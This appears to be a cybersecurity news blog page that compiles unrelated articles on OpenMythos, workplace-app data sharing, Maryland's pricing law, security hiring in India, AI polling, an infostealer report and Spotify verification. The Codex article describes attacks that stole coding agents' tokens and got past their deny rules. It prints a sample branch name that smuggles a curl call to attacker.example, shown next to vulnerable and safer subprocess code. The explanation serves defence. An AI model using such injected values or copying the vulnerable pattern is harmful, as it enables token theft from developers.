Yet in just two weeks, a 22-year-old developer named Kye Gomez inferred the core design choices that make Claude Mythos so capable and published OpenMythos, an open project that attempts to anticipate Anthropic's breakthrough. Gomez's code created a tsunami in the AI and tech research community.

If real, the incident has serious implications. If a self-taught developer can reverse-engineer the core innovation of a billion-dollar AI firm in just a few days, what could threat actors with malicious intent do? And if that becomes routine, the debate over keeping AI architectures proprietary will fade away.

About OpenMythos


OpenMythos allows developers to run and train effective variants of these models on laptops, which also raises questions about long-term dependence on enormous data centers and the environmental and community damage they cause.

Boon or curse?


For now, fortunately, most organizations cannot simply obtain the AI secrets that only big tech companies such as OpenAI, Anthropic, and Google control.

But what if users and small teams across the world could also reverse-engineer the work of the biggest AI companies? It would be difficult to maintain a safe technological order: advanced capabilities would sprout everywhere and be difficult to contain.

As for the developer himself, Gomez is not your typical ML engineer. He started coding as a kid, left school early, and did not attend college; he built his reputation through his code.

Why OpenMythos


OpenMythos is built on Gomez's hypothesis that Claude Mythos uses a unique large language model (LLM) architecture that has been under development since 2022 and proved reliable in large-scale training at the start of this year. How is OpenMythos different from Claude Mythos?

Instead of stacking additional neural network layers to give the model depth, the approach loops data repeatedly through a smaller block, letting the model build up effective depth over successive passes.
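
That description is close in spirit to what researchers often call weight-tied or recurrent depth, where one smaller block is applied repeatedly instead of stacking many distinct layers. The PyTorch sketch below is a purely hypothetical illustration of that general idea, not Anthropic's or Gomez's actual design, and every hyperparameter in it is arbitrary.

```python
import torch
import torch.nn as nn

class LoopedEncoder(nn.Module):
    """A single small transformer block applied `loops` times instead of `loops` distinct layers."""

    def __init__(self, d_model: int = 256, n_heads: int = 4, loops: int = 12):
        super().__init__()
        self.block = nn.TransformerEncoderLayer(d_model, n_heads, batch_first=True)
        self.loops = loops

    def forward(self, x: torch.Tensor) -> torch.Tensor:
        for _ in range(self.loops):  # effective depth grows with each pass over the same weights
            x = self.block(x)
        return x

if __name__ == "__main__":
    tokens = torch.randn(2, 16, 256)       # (batch, sequence, embedding)
    print(LoopedEncoder()(tokens).shape)   # torch.Size([2, 16, 256])
```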

Workplace Apps May Be Selling Employee Data Without Consent, Study Warns

 

A growing number of workplace applications are collecting vast amounts of employee data and, in many cases, sharing or selling that information to third-party companies without workers’ knowledge or permission, according to a recent analysis by privacy-focused tech company Incogni.

The company, which specializes in helping users locate and remove personal information from online databases, examined several employer-provided tools and widely used workplace communication platforms. The findings revealed how deeply integrated data collection has become in modern work environments, raising fresh concerns about employee privacy and cybersecurity.

“Collectively, these apps account for over 12.5 billion downloads on Google Play alone,” the Incogni post on the findings said. “On average, workplace apps collect around 19 data points and share approximately 2 data types [per user]. The three Google and Microsoft apps (Gmail, Google Meet, and Microsoft Teams) cluster at the top of the collection spectrum, each gathering 21–26 data types.”

The report highlighted that common communication platforms such as Gmail, Zoom, and Microsoft Teams often gather extensive user information. However, unlike consumer-focused platforms that sometimes provide opt-out settings, many workplace-mandated tools do not offer employees the ability to refuse data collection.

According to Incogni, productivity tracking and monitoring applications are especially aggressive in sharing information with outside organizations. Beyond standard details such as email addresses, location data, contacts, and app activity, some applications may also collect sensitive financial or health-related information.

The report identified Notion as one of the most data-sharing-intensive platforms reviewed. Using the app as an example, Incogni stated that it “shares the most data with third parties, distributing 8 distinct data types to third parties—including email addresses, names, user IDs, device or other IDs, and app interactions.”

Privacy experts warn that this growing exchange of employee data creates significant risks. Once personal information is transferred to multiple external entities, workers may lose visibility and control over how their data is being used. In addition, broader distribution increases exposure to cyberattacks and data breaches, incidents that platforms like Slack and Zoom have previously experienced.

“People tend to think of workplace apps as safe tools, but they don’t exist in isolation,” Incogni CEO Darius Belejevas told enterprise technology publication No Jitter. “A lot of them are part of much larger data ecosystems. Once information is collected, especially if it’s shared with third parties, it can travel much further than users expect.”

Experts suggest employees can lower some of these risks by limiting personal activity on workplace communication platforms and avoiding the use of personal devices for professional work whenever possible.

At the same time, businesses are being encouraged to prioritize stricter privacy protections when selecting workplace software. Organizations may benefit from requiring vendors to reduce unnecessary data collection and restrict third-party sharing practices before adopting enterprise tools.

“Workplace applications that access and share employee information can pose significant security and privacy risks for organizations,” Sarah McBride told No Jitter. “These risks arise from the sensitive nature of the data involved, the potential for misuse, and vulnerabilities in the applications themselves.”

Maryland’s New Grocery Pricing Rules Leave Critics Unconvinced


 

Despite the increasing acceptance of algorithmic pricing systems in today's retail ecosystem, Maryland has taken action to establish the first statewide legal ban on grocery pricing that incorporates consumer surveillance data. 

By signing House Bill 895 into law on April 28, 2026, Governor Wes Moore established a regulatory framework restricting how food retailers and third-party delivery platforms may use personal data to influence the prices consumers pay.

The Act is formally titled the Protection From Predatory Pricing Act. Specifically, this legislation addresses the use of artificial intelligence-driven pricing engines and behavioral analytics that may adjust prices according to factors such as purchase history, browser activity, geographical location, and demographic traits. 

The law, framed by state officials as an effective consumer protection measure against profit optimization powered by data, prohibits large food retailers, qualified delivery service providers, and others operating stores over 15,000 square feet from imposing higher prices on consumers based upon individual data signals. Supporters see the measure as a significant step in responding to the increasing commercialization of consumer data, but critics claim that the measure’s limited scope and enforcement structures may significantly erode its practical significance.

The Maryland approach is being closely examined as a possible template for pricing regulation in the future by policymakers and industry stakeholders throughout the United States. The debate is centered on the increasing use of surveillance-based dynamic pricing systems that continuously adjust product costs based on an analysis of the consumer’s digital footprint as well as their purchasing patterns, geographic location, and demographics. These models may result in completely different prices for the same grocery item if two shoppers purchase the item within minutes of each other. The results are determined by algorithms that analyze shoppers' perceived purchase tolerance.

Consumer advocates and competition analysts contend that such practices shift pricing strategy away from traditional market factors and toward individualised revenue extraction, enabling businesses to identify and charge the highest amount that a specific customer is statistically likely to accept.

Although Maryland's legislation is tailored specifically to the grocery sector, federal regulators such as the Federal Trade Commission have previously identified similar pricing mechanisms across retail categories including apparel, cosmetics, home improvement products, and consumer goods.

Several advocacy groups argue the stakes are even higher in food retail, where pricing volatility directly affects household affordability and access to essentials. Following committee-level debates over enforcement language and consumer protection standards, the legislation quickly gained momentum, culminating in Senate approval on March 23, 2026, and final House concurrence after several weeks of sustained industry lobbying.

With HB 895 signed on April 28, Maryland became the first state with legislation prohibiting discriminatory, surveillance-driven grocery pricing practices. As the state's Attorney General prepares interpretive guidance later this summer, retailers and third-party delivery platforms have a roughly five-month compliance window before the statute takes effect on October 1, 2026.

While the legislation has received broad bipartisan support, the accelerated legislative process has left unresolved compliance and evidentiary questions that industry stakeholders are now seeking to clarify. In Maryland, enforcement authority is primarily delegated to the Maryland Consumer Protection Division and the Attorney General, where violations can be prosecuted as unfair and deceptive trade practices subject to civil penalties of up to $10,000 per violation, with repeat offenses subject to double fines. 

Furthermore, individuals may face misdemeanor penalties, including imprisonment for up to a year and a fine of up to $1,000. The law also gives businesses accused of violations 45 days to cure the alleged misconduct before formal enforcement begins, a window critics claim could substantially weaken its deterrent effect.

Because private rights of action are narrowly limited outside certain labor-related circumstances, early legal interpretation is expected to be shaped primarily by state-led enforcement actions that test whether algorithmic pricing decisions rely on protected categories of personal information.

Regulatory specialists anticipate that the forthcoming guidance will clarify the evidence standards necessary to establish data-driven pricing manipulation, particularly when such manipulation involves opaque artificial intelligence systems and automated pricing engines. For retailers with mature compliance programs, financial penalties are likely to remain manageable. However, legal observers note that reputational damage, regulatory scrutiny, and the erosion of consumer trust may ultimately prove more consequential than statutory fines.

Labor unions, consumer advocacy organizations, and digital rights analysts have intensified the debate over Maryland's surveillance pricing law, arguing that it contains significant operational gaps retailers could exploit through sophisticated pricing strategies. The United Food and Commercial Workers International Union has already launched public awareness campaigns, including a 30-second advertisement illustrating how algorithmic pricing systems could reshape grocery shopping based on predictions of consumer behavior.

The advocacy groups maintain that despite the statute's significant legal precedent, the exemptions and enforcement structure may ultimately permit the continuation of many forms of data-driven price discrimination. Before the bill was enacted, Consumer Reports researchers had warned lawmakers about the bill's weaknesses, arguing that it lacks a clear baseline price standard against which discriminatory pricing could be measured.

Policy analysts have suggested that this omission creates a situation where nearly any fluctuating price could be framed as a promotional discount rather than a targeted surcharge. Criticism has also focused on the fact that the law restricts individualized pricing while still permitting hyper-segmented pricing models that sort consumers into highly specific groups based on demographic or behavioral characteristics. A growing consensus among consumer advocates holds that pricing strategies aimed at narrowly defined groups, such as elderly individuals living alone in areas with limited retail options, can produce outcomes similar to targeting individual consumers directly.

The broad exemptions granted to loyalty programs, membership pricing structures, subscription-based purchases, and recurring service models are also being criticized as providing retailers with alternative mechanisms for deploying surveillance-based pricing systems that would not technically violate the law. 

Maryland's legislation has sparked widespread national interest, with at least a dozen states, including New York, New Jersey, and Illinois, considering similar restrictions on algorithmic price personalization. Consumer rights advocates describe the Maryland experience as an early regulatory stress test that may guide how future state legislatures address the intersection of artificial intelligence, behavioral analytics, and retail pricing governance.

Some critics of the current framework, such as consumer advocate Oyefeso, contend that it risks legitimizing more extensive surveillance-based pricing practices by signaling to retailers that some forms of algorithmic personalization remain legal. Supporters of stronger reforms, however, believe the legislation may be revisited in subsequent sessions as lawmakers grapple with the practical realities of enforcing transparency and accountability in increasingly opaque AI-driven pricing environments.

Maryland's move to regulate surveillance pricing marks a significant shift in the broader debate over how artificial intelligence, consumer data, and algorithmic commerce should be governed in essential retail markets. Critics argue that the law's exemptions, cure periods, and enforcement limitations may blunt its immediate effectiveness; even so, it has already set a national benchmark by forcing policymakers, retailers, and technology companies to confront the ethical and regulatory implications of data-driven price personalization.

As more states weigh similar measures and scrutiny of algorithmic pricing grows, Maryland's framework may serve as both a cautionary example and a foundation for future policies protecting consumers from algorithmic pricing abuses.

A growing number of grocery retailers and delivery platforms have become aware that pricing systems that use behavioral analytics and artificial intelligence will no longer be exempt from regulatory oversight, particularly when affordability, transparency, and public trust are at stake.

India’s Cybersecurity Workforce Struggles to Keep Pace as AI and Cloud Systems Expand

 



India’s fast-growing digital economy is creating an urgent demand for cybersecurity professionals, but companies across the country are finding it increasingly difficult to hire people with the technical expertise required to secure modern systems.

A new study released by the Data Security Council of India and SANS Institute found that businesses are facing a serious shortage of skilled cybersecurity workers as technologies such as artificial intelligence, cloud computing, and API-driven infrastructure become more deeply integrated into daily operations.

According to the Indian Cyber Security Skilling Landscape Report 2025–26, nearly 73 per cent of enterprises and 68 per cent of service providers said there is a limited supply of qualified cybersecurity professionals in the country. The report suggests that organisations are struggling to build teams capable of handling increasingly advanced cyber risks at a time when companies are rapidly digitising services, storing more information online, and adopting AI-powered tools.

The hiring process itself is also becoming slower. Around 84 per cent of organisations surveyed said cybersecurity positions often remain vacant for one to six months before suitable candidates are found. This delay reflects a growing mismatch between industry expectations and the skills available in the job market.

Researchers noted that many applicants entering the cybersecurity workforce lack practical exposure to real-world security environments. Around 63 per cent of enterprises and 59 per cent of service providers said candidates often do not possess sufficient hands-on technical experience. Employers are no longer only looking for basic security knowledge. Companies increasingly require professionals who understand multiple areas at once, including cloud infrastructure, application security, digital identity systems, and access management technologies. Nearly 58 per cent of enterprises and 60 per cent of providers admitted they are struggling to find candidates with this type of cross-functional expertise.

The report connects this shortage to the changing structure of enterprise technology systems. Many organisations are moving away from traditional on-premise setups and shifting toward cloud-native environments, interconnected APIs, and AI-supported operations. As businesses automate more routine tasks, demand is gradually moving away from entry-level operational positions and toward specialised cybersecurity roles that require analytical thinking, threat detection capabilities, and advanced technical decision-making.

Artificial intelligence is now becoming one of the largest drivers of cybersecurity hiring demand. Around 83 per cent of organisations surveyed described AI and generative AI security skills as essential for future operations, while 78 per cent reported strong demand for AI security engineers. The findings also show that nearly 62 per cent of enterprises are already running active AI or generative AI projects, which experts say can create additional security risks if systems are not properly monitored and protected.

As companies deploy AI systems, the attack surface for cybercriminals also expands. Security teams are now expected to defend AI models, protect sensitive datasets, monitor automated systems for manipulation, and secure APIs connecting multiple digital services. Industry experts have repeatedly warned that many organisations are adopting AI tools faster than they are building security frameworks around them.

Some cybersecurity positions remain especially difficult to fill. The report found that almost half of service providers and nearly 40 per cent of enterprises are struggling to recruit security architects, professionals responsible for designing secure digital infrastructure and long-term defence strategies. Demand is also increasing for specialists in operational technology and industrial control system security, commonly known as OT/ICS security. These professionals help protect critical infrastructure such as manufacturing facilities, power systems, transportation networks, and industrial operations from cyberattacks.

At the same time, companies are facing growing retention problems. Around 70 per cent of service providers and 42 per cent of enterprises said employees are frequently leaving for competitors offering better salaries and career opportunities. Limited access to advanced training and upskilling programs is also contributing to workforce attrition across the sector.

The findings point to a larger issue facing the cybersecurity industry globally: technology is evolving faster than workforce development. Experts believe companies, educational institutions, and training organisations may need to work more closely together to create industry-focused learning pathways that prepare professionals for modern cyber threats instead of relying heavily on theoretical instruction alone.

With India continuing to expand digital public infrastructure, cloud adoption, fintech services, AI development, and connected industrial systems, cybersecurity professionals are expected to play a central role in protecting sensitive information, maintaining operational stability, and preserving trust in digital platforms.

AI Polling Reshapes Political Research as Firms Turn Conversations Into Data

 

Artificial intelligence is rapidly transforming the world of political opinion polling, replacing time-consuming human-led interviews with automated conversational systems capable of analysing public sentiment at scale.

"When you hear the word 'politician', what is the first image or emotion that comes to mind?"

The question is asked not by a human researcher, but by an AI-powered voice assistant. While a respondent shares his views over the phone, multiple AI systems simultaneously analyse the conversation. One verifies whether the person is answering the question correctly, another evaluates the depth of the response, while a third checks for possible fraud or bot-like behaviour.
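
Naratis has not published how its platform is built, but the article's description of several analysers working on the same live response maps onto a simple concurrent pipeline. The sketch below is a hypothetical illustration only, not the company's system: the three checks (relevance, depth, fraud signals) are crude placeholder heuristics standing in for whatever models a real polling platform would use, and all names are assumptions.

```python
import asyncio
from dataclasses import dataclass


@dataclass
class Assessment:
    check: str
    score: float
    note: str


async def check_relevance(question: str, answer: str) -> Assessment:
    # Placeholder heuristic: counts shared words as a crude relevance proxy.
    # A production system would call an LLM or a trained classifier instead.
    q_words = {w.strip("'?.,") for w in question.lower().split()}
    a_words = {w.strip("'?.,") for w in answer.lower().split()}
    shared = len(q_words & a_words)
    return Assessment("relevance", min(shared / 3, 1.0), f"{shared} shared words")


async def check_depth(answer: str) -> Assessment:
    # Placeholder heuristic: longer, multi-clause answers score higher.
    return Assessment("depth", min(len(answer.split()) / 50, 1.0), "length proxy")


async def check_fraud(answer: str) -> Assessment:
    # Placeholder heuristic: highly repetitive answers look more bot-like.
    words = answer.lower().split()
    repetition = 1 - len(set(words)) / max(len(words), 1)
    return Assessment("fraud", repetition, "repetition ratio")


async def analyse_turn(question: str, answer: str) -> list[Assessment]:
    # The three checks described in the article run concurrently on one turn.
    return await asyncio.gather(
        check_relevance(question, answer),
        check_depth(answer),
        check_fraud(answer),
    )


if __name__ == "__main__":
    q = "When you hear the word 'politician', what comes to mind?"
    a = "Mostly distrust, honestly, although my local mayor has been responsive."
    for result in asyncio.run(analyse_turn(q, a)):
        print(result)
```

The same pattern extends naturally to the "parallelisation" Fontaine describes later: many interview sessions, each with its own set of analysers, can be scheduled concurrently rather than handled one at a time by human researchers.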

The technology is being developed by Naratis, a French start-up focused on bringing artificial intelligence into political opinion research.

"The US has start-ups like Outset, Listen Labs and Hey Marvin that do AI polling like this in the commercial sphere. To my knowledge we're the first to do this for political opinion polling as well," says Pierre Fontaine, the 28-year-old engineer who founded the firm in 2025.

The emergence of AI-led polling marks a major shift for an industry traditionally dependent on manual interviews and extensive human analysis. In countries such as France, polling firms are increasingly exploring automation to reduce costs and speed up research processes.

Naratis specifically targets qualitative research, which is widely regarded as the most expensive and labour-intensive form of polling. Traditionally, these studies involve one-on-one interviews or focus groups that can take weeks to organise and analyse. By using conversational AI, the company says it can significantly reduce both time and cost.

Rather than relying on standard multiple-choice surveys, the platform encourages participants to engage in conversations with AI systems. "We don't ask people to tick boxes - they have a conversation with an AI," Fontaine explains. "That means we can explore not just what people think, but how they think - how they build their opinions, and even when those opinions change."

The company claims its approach is "10 times faster, 10 times cheaper and 90% as accurate as human polling".

According to the firm, projects that previously required weeks and substantial budgets can now be completed within a couple of days, with some responses collected in less than 24 hours. Fontaine describes this advantage as "parallelisation", where numerous AI agents conduct interviews simultaneously instead of relying on individual human researchers.

The rise of AI polling comes at a challenging time for the polling industry overall. Survey participation rates have dropped sharply over the decades, increasing operational costs and raising concerns about the reliability and representativeness of public opinion studies.

Supporters of AI polling argue that conversational systems may encourage respondents to be more honest, especially when discussing politically sensitive issues. Some researchers believe this could reduce social desirability bias, where people avoid expressing controversial opinions to human interviewers.

However, critics remain cautious about the growing dependence on AI in political research. Concerns include the possibility of AI systems generating inaccurate conclusions, producing overly generic responses, or creating misleading synthetic data.

Questions have also emerged around the use of "digital twins" and "synthetic people" — AI-generated profiles designed to imitate real human behaviour. While some market research firms use such tools for testing and simulations, many organisations remain reluctant to apply them in political polling.

At Ipsos, AI is already used extensively in consumer and behavioural research, including analysing user-recorded videos and studying social media activity. However, major firms continue to maintain human oversight in politically sensitive projects.

At OpinionWay, AI may assist with conducting interviews, but "we would never publish an opinion poll based on AI-generated data," says the firm's CEO, Bruno Jeanbart, citing concerns about trust.

Experts believe the future of polling will likely involve a hybrid approach combining AI efficiency with human supervision. While automation can accelerate research and lower costs, human researchers are still considered essential for validating findings, interpreting nuance and ensuring accountability.

Even AI advocates acknowledge the need for caution. "The goal is end-to-end automation, but today it would be unsafe and socially unacceptable to remove humans entirely," says Le Brun.

As economic pressures continue to push the polling industry toward faster and cheaper methods, companies like Naratis are betting that AI-driven conversations could redefine how public opinion is collected and understood. Whether this transformation strengthens trust in polling or deepens public scepticism may ultimately depend on how responsibly the technology is implemented and regulated.

Ransomware Attacks Reach All-Time High, Over 2.86 Billion Credentials Leaked

 

A recent analysis of cybercrime data from last year (2025) found that the number of ransomware victims rose sharply, up 45% on the previous year. More worrying than the headline figure, however, is attackers' heavy reliance on stolen credentials as their primary entry point. Whatever platforms you use and whatever accounts you are trying to protect, it is time to start paying closer attention to password security.

State of Cybercrime Report 2026


The report from KELA found over 2.86 billion compromised credentials, passwords, session cookies, and other data that can be used to bypass two-factor authentication (2FA). Notably, authentication services and business cloud accounts made up over 30% of the leaked data in 2025.

The analysis also revealed that credential-stealing infostealer malware is not limited to any one operating system: “infections on macOS devices increased from fewer than 1,000 cases in 2024 to more than 70,000 in 2025, a 7,000% increase,” the report said.

Expert advice


Security experts writing in Forbes have warned users about the risks of infostealer malware countless times, covering everything from FBI operations aimed at shutting down cybercrime gangs to the millions of Gmail passwords found in leaked infostealer logs. Despite the KELA analysis and that earlier coverage, the risk persists, and the damage is increasing year after year.

About infostealer


Kela defines the malware as software “designed to exfiltrate sensitive data from compromised machines, including login credentials, authentication tokens, and other critical account information.” What is more troublesome is the near-universal availability of malware-as-a-service operations across the dark web, which has not merely lowered the barrier to entry for expert and amateur threat actors alike but removed it almost entirely.

Data compromise in billions


In 2025, Kela identified around “3.9 million unique machines infected with infostealer malware globally, which collectively yielded 347.5 million compromised credentials.” The grand total comes to 2.86 billion compromised credentials across all sources, combining databases of infostealer logs and dark web criminal marketplaces.

Tricks used by infostealers:


Phishing-as-a-Service kits, delivered through AI-generated tailored scams, messaging apps, and email, are frequently used to get around MFA. In so-called "hack your own password" attacks, users are tricked into manually running scripts that bypass conventional security measures.

Trojanized software is promoted through malicious advertisements and search results, increasing the risk of infection. In supply chain attacks, poisoned packages and DevTools impersonation target high-privilege credentials. Compromised browser extension updates enable form-grabbing and cookie theft. Fake software updates and pirated apps also remain effective.

OpenAI Codex Bug Leads to GitHub Token Breach

 

In March 2026, researchers from BeyondTrust showed that a crafted GitHub branch name was enough to steal Codex’s OAuth token in cleartext. OpenAI classified the issue as “Critical P1”. Soon after, Anthropic’s Claude Code source code leaked into the public npm registry, and Adversa reported that Claude Code silently ignored its own deny rules once a prompt (command) exceeded 50 subcommands.

Malicious code in AI


These were not isolated vulnerabilities. They were part of a nine-month run in which six research teams revealed exploits against Copilot, Vertex AI, Codex, and Claude Code. Every exploit followed the same pattern: an AI agent held a credential, performed an action, and authenticated to a production system without any human session backing the request.

The attack surface was first showcased at Black Hat USA 2025, where researchers hacked ChatGPT, Microsoft Copilot Studio, Gemini, Cursor, and many more on stage, with zero clicks. Nine months later, threat actors were exploiting those same credentials.

How a branch name in Codex compromised GitHub


Researchers at BeyondTrust found that Codex cloned repositories using a GitHub OAuth token embedded in the git remote URL. During cloning, the branch name was passed into a setup script without sanitisation, allowing malicious data through. A backtick subshell and a semicolon were enough to turn a branch name into an extraction payload.
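
The write-up does not include OpenAI's internal setup script, but the vulnerability class it describes, shell command injection through an untrusted branch name, is straightforward to illustrate. The sketch below is a hypothetical Python example, not Codex's actual code: the attacker-controlled branch name and URL are invented, and subprocess is used only to make the shell-versus-no-shell distinction explicit.

```python
import subprocess

# Hypothetical attacker-controlled branch name (illustrative only). The
# backticks ask the shell to run a command and substitute its output, and
# the semicolon lets anything after it execute as a separate command.
branch = "main`curl -s https://attacker.example/exfil`;echo injected"

# Hypothetical clone URL with an access token embedded, mirroring the
# pattern described in the article (OAuth token placed in the remote URL).
remote = "https://x-access-token:FAKE_TOKEN@github.com/example-org/example-repo.git"

# VULNERABLE PATTERN: interpolating untrusted input into a shell string.
# /bin/sh parses the backticks and the semicolon as shell syntax, so the
# attacker's commands run with whatever the setup step can see, including
# the token embedded in the remote URL above.
subprocess.run(f"git clone --branch {branch} {remote} workspace", shell=True)

# SAFER PATTERN: pass arguments as a list and skip the shell entirely.
# The branch name is now literal data; git simply fails to find a branch
# with that name instead of executing it.
subprocess.run(
    ["git", "clone", "--branch", branch, remote, "workspace"],
    check=False,
)
```

OpenAI's actual fix is not detailed in the report; as a general matter, validating branch names and keeping untrusted input away from any shell interpretation is the standard mitigation for this class of bug.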

About the bug


The vulnerability affects the ChatGPT website, Codex CLI, Codex SDK, and the Codex IDE Extension. All reported issues have since been fixed in collaboration with OpenAI's security team.

This vulnerability allows an attacker to inject arbitrary commands through the GitHub branch name parameter, potentially enabling the automated theft of a victim's GitHub User Access Token, the same token Codex uses to authenticate with GitHub.

Vulnerability impact


Because the attack can be automated, the vulnerability can scale to compromise many people interacting with a shared environment or GitHub repository.

“OpenAI Codex is a cloud-based coding agent, accessible through ChatGPT. It allows users to point the tool toward a codebase and submit tasks through a prompt. Codex then spins up a managed container instance to execute these tasks—such as generating code, answering questions about a codebase, creating pull requests, and performing code reviews against the selected repository,” said BeyondTrust.

Spotify Verified Badge Targets AI Music Confusion as Human Artist Authentication Expands

 

Now appearing beside artist profiles, Spotify’s new “Verified by Spotify” badge uses a green checkmark to highlight real human creators. Only accounts meeting the platform’s internal authenticity checks receive the label. Rather than algorithm-built personas, these profiles represent actual musicians behind the music. The rollout is happening gradually, changing how artists appear in searches, playlists, and recommendations. 

The update arrives as concerns continue growing around AI-generated music flooding streaming services. Spotify says verification depends on signals such as active social media accounts, consistent listener activity, merchandise listings, and live performance schedules - indicators suggesting a genuine person is tied to the profile. 

According to the company, these measures are designed to separate human creators from automated content increasingly appearing online.  Spotify says most artists users actively search for will eventually receive verification. Artists recognized for meaningful contributions to music culture are expected to be prioritized ahead of bulk-uploaded or mass-generated accounts. 

Over the coming weeks, the checkmarks will gradually appear across the platform, with influence and authenticity carrying more weight than upload volume. The move comes as streaming platforms face mounting criticism over how they handle AI-generated tracks. While the badge confirms a profile belongs to a real person, some critics quickly pointed out that it does not indicate whether artificial intelligence was used to help create the music itself. 

Questions around what counts as “real” music continue growing as AI tools become more involved in production. Creator-rights advocate and former AI executive Ed Newton-Rex warned that systems like Spotify’s may unintentionally disadvantage independent musicians who do not tour, sell merchandise, or maintain strong social media visibility. 

Instead, he suggested platforms should directly label AI-generated songs rather than relying solely on artist verification. Experts also note that defining AI involvement in music is increasingly difficult. Professor Nick Collins from Durham University described AI-assisted music creation as a broad spectrum rather than a simple divide between human-made and machine-made work. Many songs now involve software-assisted mixing, mastering, composition, or editing, making it far harder to classify music by origin alone. 

Spotify has faced years of criticism over AI-generated audio. Across forums and online communities, users have repeatedly called for clearer labels showing whether tracks were created by humans or algorithms. Some developers have even built independent tools aimed at detecting and filtering AI-generated songs on the platform. Concerns intensified after projects like The Velvet Sundown attracted large audiences despite having no interviews, live performances, or publicly traceable history. 

The group later described itself as a “synthetic music project” supported by artificial intelligence, fueling debate around transparency in digital music spaces. Spotify’s latest verification effort appears aimed at rebuilding trust while balancing support for evolving AI technologies. The move also reflects a broader trend across digital platforms, where companies are introducing verification systems to distinguish human-created content from synthetic material as AI-generated media becomes harder to identify.